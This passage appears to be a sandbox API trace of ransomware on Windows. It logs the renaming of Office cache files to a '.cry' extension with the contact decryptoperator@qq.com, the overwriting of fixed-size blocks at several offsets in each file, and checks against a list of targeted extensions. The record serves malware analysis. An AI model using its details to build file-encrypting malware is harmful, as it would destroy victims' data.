(normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0035.599] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0035.599] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0035.599] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.599] ReadFile (in: hFile=0x198, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.693] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.693] ReadFile (in: hFile=0x198, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.831] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.831] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.831] ReadFile (in: hFile=0x198, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.948] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.948] WriteFile (in: hFile=0x198, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0035.964] SetEndOfFile (hFile=0x198) returned 1 [0035.964] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ec0058 [0035.967] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.967] WriteFile (in: hFile=0x198, lpBuffer=0x3ec0058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ec0058*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.968] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.968] WriteFile (in: hFile=0x198, lpBuffer=0x3ec0058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ec0058*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.973] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.973] WriteFile (in: hFile=0x198, lpBuffer=0x3ec0058*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ec0058*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.976] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ec0058 | out: hHeap=0x600000) returned 1 [0035.976] CloseHandle (hObject=0x198) returned 1 [0036.847] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.992] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.993] lstrlenW (lpString=".doc") returned 4 [0036.993] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0036.993] lstrlenW (lpString=".docx") returned 5 [0036.993] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0036.993] lstrlenW (lpString=".pdf") returned 4 [0036.993] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0036.993] lstrlenW (lpString=".xls") returned 4 [0036.993] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0036.993] lstrlenW (lpString=".xlsx") returned 5 [0036.993] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0036.993] lstrlenW (lpString=".ppt") returned 4 [0036.993] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0036.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.993] lstrlenW (lpString=".zip") returned 4 [0036.993] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0036.993] lstrlenW (lpString=".rar") returned 4 [0036.993] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0036.993] lstrlenW (lpString=".bz2") returned 4 [0036.993] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0036.993] lstrlenW (lpString=".7z") returned 3 [0036.993] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0036.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.993] lstrlenW (lpString=".dbf") returned 4 [0036.993] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0036.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.993] lstrlenW (lpString=".1cd") returned 4 [0036.993] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0036.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.993] lstrlenW (lpString=".jpg") returned 4 [0036.993] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0036.993] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.994] lstrlenW (lpString=".doc") returned 4 [0036.994] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0036.994] lstrlenW (lpString=".docx") returned 5 [0036.994] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0036.994] lstrlenW (lpString=".pdf") returned 4 [0036.994] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0036.994] lstrlenW (lpString=".xls") returned 4 [0036.994] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0036.994] lstrlenW (lpString=".xlsx") returned 5 [0036.994] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0036.994] lstrlenW (lpString=".ppt") returned 4 [0036.994] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0036.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.994] lstrlenW (lpString=".zip") returned 4 [0036.994] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0036.994] lstrlenW (lpString=".rar") returned 4 [0036.994] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0036.994] lstrlenW (lpString=".bz2") returned 4 [0036.994] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0036.994] lstrlenW (lpString=".7z") returned 3 [0036.994] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0036.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.994] lstrlenW (lpString=".dbf") returned 4 [0036.994] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0036.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.994] lstrlenW (lpString=".1cd") returned 4 [0036.994] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0036.994] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.994] lstrlenW (lpString=".jpg") returned 4 [0036.994] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0036.995] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0036.995] lstrlenW (lpString="PublisherMUI.msi") returned 16 [0036.995] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0036.996] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=2513920) returned 1 [0036.996] CloseHandle (hObject=0x18c) returned 1 [0036.996] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi")) returned 0x2020 [0036.996] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.996] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0036.997] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0036.997] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0036.997] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.997] ReadFile (in: hFile=0x18c, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.063] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.065] ReadFile (in: hFile=0x18c, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.124] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0037.124] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.124] ReadFile (in: hFile=0x18c, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0037.423] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.423] WriteFile (in: hFile=0x18c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc010c, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc010c, lpOverlapped=0x0) returned 1 [0037.445] SetEndOfFile (hFile=0x18c) returned 1 [0037.445] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3f34090 [0037.620] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.620] WriteFile (in: hFile=0x18c, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.626] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xcc955, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.626] WriteFile (in: hFile=0x18c, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.631] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x225c00, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0037.631] WriteFile (in: hFile=0x18c, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0037.642] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f34090 | out: hHeap=0x600000) returned 1 [0037.645] CloseHandle (hObject=0x18c) returned 1 [0037.996] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0037.996] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.996] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.996] lstrlenW (lpString=".doc") returned 4 [0037.996] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.996] lstrlenW (lpString=".docx") returned 5 [0037.996] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.996] lstrlenW (lpString=".pdf") returned 4 [0037.996] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.996] lstrlenW (lpString=".xls") returned 4 [0037.996] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.996] lstrlenW (lpString=".xlsx") returned 5 [0037.996] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.996] lstrlenW (lpString=".ppt") returned 4 [0037.996] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.996] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.996] lstrlenW (lpString=".zip") returned 4 [0037.996] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.996] lstrlenW (lpString=".rar") returned 4 [0037.996] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.996] lstrlenW (lpString=".bz2") returned 4 [0037.996] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.996] lstrlenW (lpString=".7z") returned 3 [0037.996] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.996] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.996] lstrlenW (lpString=".dbf") returned 4 [0037.996] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.996] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.996] lstrlenW (lpString=".1cd") returned 4 [0037.996] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.997] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.997] lstrlenW (lpString=".jpg") returned 4 [0037.997] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.997] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.997] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.997] lstrlenW (lpString=".doc") returned 4 [0037.997] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0037.997] lstrlenW (lpString=".docx") returned 5 [0037.997] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0037.997] lstrlenW (lpString=".pdf") returned 4 [0037.997] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0037.997] lstrlenW (lpString=".xls") returned 4 [0037.997] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0037.997] lstrlenW (lpString=".xlsx") returned 5 [0037.997] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0037.997] lstrlenW (lpString=".ppt") returned 4 [0037.997] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0037.997] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.997] lstrlenW (lpString=".zip") returned 4 [0037.997] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0037.997] lstrlenW (lpString=".rar") returned 4 [0037.997] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0037.997] lstrlenW (lpString=".bz2") returned 4 [0037.997] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0037.997] lstrlenW (lpString=".7z") returned 3 [0037.997] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0037.997] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.997] lstrlenW (lpString=".dbf") returned 4 [0037.997] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0037.997] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.997] lstrlenW (lpString=".1cd") returned 4 [0037.997] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0037.997] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 79 [0037.997] lstrlenW (lpString=".jpg") returned 4 [0037.997] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0037.998] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0037.998] lstrlenW (lpString="OutlkLR.cab") returned 11 [0037.998] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0037.998] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=14819276) returned 1 [0037.998] CloseHandle (hObject=0x18c) returned 1 [0037.998] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab")) returned 0x2020 [0037.998] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.998] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0037.999] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0037.999] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0037.999] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0037.999] ReadFile (in: hFile=0x18c, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.565] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.565] ReadFile (in: hFile=0x18c, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.792] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0038.792] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.792] ReadFile (in: hFile=0x18c, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.825] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.825] WriteFile (in: hFile=0x18c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0038.837] SetEndOfFile (hFile=0x18c) returned 1 [0038.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3f34090 [0038.841] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.841] WriteFile (in: hFile=0x18c, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.842] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x4b5fee, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.842] WriteFile (in: hFile=0x18c, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.843] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xde1fcc, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.843] WriteFile (in: hFile=0x18c, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.844] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f34090 | out: hHeap=0x600000) returned 1 [0038.844] CloseHandle (hObject=0x18c) returned 1 [0040.319] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0040.320] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 74 [0040.320] lstrlenW (lpString="C:\\MSOCache\\All 